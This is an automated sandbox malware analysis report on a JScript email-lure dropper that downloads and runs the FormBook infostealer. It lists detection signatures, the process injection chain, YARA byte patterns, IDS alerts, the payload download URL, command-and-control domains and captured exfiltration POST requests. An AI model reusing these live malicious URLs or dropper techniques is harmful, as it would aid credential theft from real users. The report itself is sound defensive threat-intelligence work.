Windows Analysis Report
0900664 MOHS Tender..js

Overview

General Information

Sample Name:0900664 MOHS Tender..js
Analysis ID:794330
MD5:a83afa6f04c636145ba81c1ae4fb0b09
SHA1:a229f1ae98501e9fb00097986b3e76a910c97903
SHA256:15232283ec281be6d000c6f5286007413363ec3fcb108642e49791a953540de1
Tags:js
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
JScript performs obfuscated calls to suspicious functions
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
Deletes itself after installation
Potential obfuscated javascript found
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Uses ipconfig to lookup or modify the Windows network settings
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Connects to several IPs in different countries
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • wscript.exe (PID: 1252 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0900664 MOHS Tender..js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • winner.exe (PID: 3276 cmdline: "C:\Users\user\AppData\Local\Temp\winner.exe" MD5: A9C03263C6DD4A1B672955A5ECADC1FF)
      • CasPol.exe (PID: 5212 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
        • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • ipconfig.exe (PID: 4984 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
    00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x20e23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xcc42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x19e68:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x19904:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x19f6a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1a0e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xc80d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x18b4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1fbca:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x20b7d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x1f030:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x18277:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Source | Rule | Description | Author | Strings
      2.2.CasPol.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        2.2.CasPol.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
        • 0x20e23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xcc42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        2.2.CasPol.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x19e68:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x19904:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x19f6a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1a0e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xc80d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x18b4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1fbca:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x20b7d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.CasPol.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
          2.2.CasPol.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x20023:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xbe42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1926a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          No Sigma rule has matched
          Timestamp: 01/30/23-13:39:50.282718 | SID: 2031412 | Source: 192.168.2.5:49707 | Destination: 14.128.47.126:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:42:32.091612 | SID: 2031449 | Source: 192.168.2.5:49743 | Destination: 14.128.47.126:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:39:50.282718 | SID: 2031449 | Source: 192.168.2.5:49707 | Destination: 14.128.47.126:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:40:11.394536 | SID: 2031449 | Source: 192.168.2.5:49712 | Destination: 208.91.197.91:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:42:32.091612 | SID: 2031412 | Source: 192.168.2.5:49743 | Destination: 14.128.47.126:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:40:51.433517 | SID: 2031412 | Source: 192.168.2.5:49720 | Destination: 23.227.38.74:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:41:08.676759 | SID: 2031453 | Source: 192.168.2.5:49724 | Destination: 199.192.28.121:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:39:50.282718 | SID: 2031453 | Source: 192.168.2.5:49707 | Destination: 14.128.47.126:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:40:51.433517 | SID: 2031453 | Source: 192.168.2.5:49720 | Destination: 23.227.38.74:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:41:08.676759 | SID: 2031449 | Source: 192.168.2.5:49724 | Destination: 199.192.28.121:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:42:25.723154 | SID: 2031449 | Source: 192.168.2.5:49742 | Destination: 87.236.16.153:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:40:51.433517 | SID: 2031449 | Source: 192.168.2.5:49720 | Destination: 23.227.38.74:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:41:08.676759 | SID: 2031412 | Source: 192.168.2.5:49724 | Destination: 199.192.28.121:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:42:32.091612 | SID: 2031453 | Source: 192.168.2.5:49743 | Destination: 14.128.47.126:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:40:11.394536 | SID: 2031412 | Source: 192.168.2.5:49712 | Destination: 208.91.197.91:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:40:21.675069 | SID: 2031449 | Source: 192.168.2.5:49715 | Destination: 66.96.162.149:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:42:25.723154 | SID: 2031412 | Source: 192.168.2.5:49742 | Destination: 87.236.16.153:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:40:21.675069 | SID: 2031412 | Source: 192.168.2.5:49715 | Destination: 66.96.162.149:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:40:11.394536 | SID: 2031453 | Source: 192.168.2.5:49712 | Destination: 208.91.197.91:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:40:21.675069 | SID: 2031453 | Source: 192.168.2.5:49715 | Destination: 66.96.162.149:80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 01/30/23-13:42:25.723154 | SID: 2031453 | Source: 192.168.2.5:49742 | Destination: 87.236.16.153:80 | Protocol: TCP | Classtype: A Network Trojan was detected

          AV Detection

          Source: 0900664 MOHS Tender..js | ReversingLabs: Detection: 17%
          Source: 0900664 MOHS Tender..js | Virustotal: Detection: 27%
          Source: Yara match | File source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: http://www.chimid.org/czni/ | Avira URL Cloud: Label: malware
          Source: http://www.laylaroseuk.com | Avira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloud/czni/ | Avira URL Cloud: Label: malware
          Source: http://www.44yyds.com/czni/ | Avira URL Cloud: Label: malware
          Source: http://www.yeah-go.com/czni/ | Avira URL Cloud: Label: malware
          Source: http://www.frogair.online | Avira URL Cloud: Label: malware
          Source: http://www.frogair.online/czni/ | Avira URL Cloud: Label: malware
          Source: http://www.laylaroseuk.com/czni/ | Avira URL Cloud: Label: malware
          Source: https://hirosguide.hu/ti/winner.exe | Avira URL Cloud: Label: malware
          Source: http://www.laylaroseuk.com/czni/?20=4xfPiv3RnE&z8rul-n=CEJ5RAslKFrvYswGKkWFaMEg5PbGdI0uMfwhN2QDDZMYEZrXiZBgo1mjS41e+07AKrnAHTFcuEyQDmPBY1Lnrpc7hFsEfyPzNg== | Avira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloud | Avira URL Cloud: Label: phishing
          Source: http://www.yeah-go.com/czni/?z8rul-n=NBbLbMKCnleo0bnLNJr7y57f08wHeLbsflpVfs6UmX5SvZLxN88Gw8EeREzrIsvGXit/2Ohq43fDpUBAiFCfWP8z8U1D0vMs/Q==&20=4xfPiv3RnE | Avira URL Cloud: Label: malware
          Source: http://www.44yyds.com/czni/?20=4xfPiv3RnE&z8rul-n=DD3LLnJbgjRI3wbnkxRSCI8A3gaHykSHoexTe78K7+O1bJpnCKZS4RFcfu7PoQdaWmtTlOOE5dVeManAz6l5Ezu0dt1GwRw+Ew== | Avira URL Cloud: Label: malware
          Source: http://www.frogair.online/czni/?20=4xfPiv3RnE&z8rul-n=5oRHUQDtYJ3jH+KiyYuXif0R6NF655imjfvnRa6lV5c+zSwVFD4ch3jkTam3ow4RLLhVoDNP5tCGnm9XMNb3kyjT9rM2PcJgOg== | Avira URL Cloud: Label: malware
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\winner[1].exe | ReversingLabs: Detection: 34%
          Source: C:\Users\user\AppData\Local\Temp\winner.exe | ReversingLabs: Detection: 34%
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\winner[1].exe | Joe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\winner.exe | Joe Sandbox ML: detected
          Source: 2.2.CasPol.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: unknown | HTTPS traffic detected: 91.227.138.48:443 -> 192.168.2.5:49703 version: TLS 1.2
          Source: Binary string: ipconfig.pdb source: CasPol.exe, 00000002.00000002.451827142.0000000001650000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: CasPol.exe, 00000002.00000002.451827142.0000000001650000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: CasPol.exe, 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.414244816.000000000106E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.412098136.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.414244816.000000000106E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.412098136.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 6_2_007631E0 FindFirstFileW,FindNextFileW,FindClose, 6_2_007631E0

          Software Vulnerabilities

          Source: 0900664 MOHS Tender..jsReturn value : ['"Shell.Application"', '3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Sc', 'F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,', 'cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.F', '45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf', '"Scripting.FileSystemObject"', 'MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,', '"SaveToFile"', 'pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVe', '"ADODB.Stream"', 'ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdS', 'vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7', 'Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,127754', '12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['"Shell.Application"', '3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Sc', 'F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,', 'cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.F', '45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf', '"Scripting.FileSystemObject"', 'MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,', '"SaveToFile"', 'pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVe', '"ADODB.Stream"', 'ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdS', 'vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7', 'Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,127754', '12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,']Go to definition
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 6_2_00758D90
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 6_2_00758D76
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 6_2_00754DAB
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 6_2_00758D8F

          Networking

          Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49707 -> 14.128.47.126:80
          Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49707 -> 14.128.47.126:80
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49707 -> 14.128.47.126:80
          Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 208.91.197.91:80
          Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 208.91.197.91:80
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 208.91.197.91:80
          Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 66.96.162.149:80
          Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 66.96.162.149:80
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 66.96.162.149:80
          Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 23.227.38.74:80
          Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 23.227.38.74:80
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 23.227.38.74:80
          Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49724 -> 199.192.28.121:80
          Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49724 -> 199.192.28.121:80
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49724 -> 199.192.28.121:80
          Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49742 -> 87.236.16.153:80
          Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49742 -> 87.236.16.153:80
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49742 -> 87.236.16.153:80
          Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49743 -> 14.128.47.126:80
          Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49743 -> 14.128.47.126:80
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49743 -> 14.128.47.126:80
          Source: C:\Windows\explorer.exe DNS query: www.deglaz.xyz
          Source: 0900664 MOHS Tender..js Return value : ['"Send"']
          Source: 0900664 MOHS Tender..js Return value : ['"MSXML2.XMLHTTP"']
          Source: 0900664 MOHS Tender..js Return value : ['"ResponseBody"']
          Source: Joe Sandbox View ASN Name: OVHFR OVHFR
          Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global traffic HTTP traffic detected:
            GET /ti/winner.exe HTTP/1.1
            Accept: */*
            Accept-Language: en-us
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: hirosguide.hu
            Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.toporsche.onlineConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.toporsche.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.toporsche.online/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 4a 36 6d 77 72 74 4a 74 65 61 62 54 6c 53 30 52 34 73 49 45 37 78 6d 69 6d 35 6d 6c 4a 41 7e 4e 56 75 70 7a 34 75 71 62 34 73 54 4c 54 42 43 56 46 71 4e 45 74 4f 4d 49 64 43 7e 6e 74 77 47 79 48 5a 79 63 6c 58 54 77 56 54 67 61 78 64 79 43 45 4e 54 71 56 6a 75 79 38 6a 39 46 53 71 31 65 6c 76 53 74 72 66 41 78 62 63 57 36 39 53 39 70 71 36 69 43 30 53 72 66 6d 76 46 72 7a 61 78 55 4f 31 54 70 51 4b 57 4d 76 61 62 6a 6d 58 7a 43 6f 30 65 62 44 41 78 69 6a 75 52 64 45 2d 68 50 65 70 6b 49 31 79 61 35 36 41 6f 51 31 4f 48 4f 61 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=J6mwrtJteabTlS0R4sIE7xmim5mlJA~NVupz4uqb4sTLTBCVFqNEtOMIdC~ntwGyHZyclXTwVTgaxdyCENTqVjuy8j9FSq1elvStrfAxbcW69S9pq6iC0SrfmvFrzaxUO1TpQKWMvabjmXzCo0ebDAxijuRdE-hPepkI1ya56AoQ1OHOaA).
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.chimid.orgConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.chimid.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.chimid.org/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 6e 36 48 75 74 70 70 51 71 79 55 75 68 37 42 59 58 45 38 52 57 49 53 38 45 68 68 31 32 53 57 6b 6d 48 58 42 68 69 54 72 41 68 65 6f 39 77 78 4f 39 2d 72 35 4f 4b 59 36 65 6d 55 4a 39 56 61 63 39 33 5a 68 53 77 31 79 68 6b 4c 53 6d 61 4e 49 71 64 4e 71 55 46 78 57 6f 49 44 49 39 52 79 69 56 71 67 30 77 6e 44 46 4c 30 4a 6a 34 72 53 62 44 6a 7e 46 42 67 4d 46 49 79 59 48 4a 76 7a 4e 44 36 63 5f 4b 48 55 59 31 58 56 58 56 52 43 6c 4c 48 72 33 42 6e 55 6b 4a 58 6a 5f 6d 36 48 6b 6d 5a 6f 65 4f 7a 5a 36 44 7a 75 67 56 36 71 76 4e 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=n6HutppQqyUuh7BYXE8RWIS8Ehh12SWkmHXBhiTrAheo9wxO9-r5OKY6emUJ9Vac93ZhSw1yhkLSmaNIqdNqUFxWoIDI9RyiVqg0wnDFL0Jj4rSbDj~FBgMFIyYHJvzND6c_KHUY1XVXVRClLHr3BnUkJXj_m6HkmZoeOzZ6DzugV6qvNw).
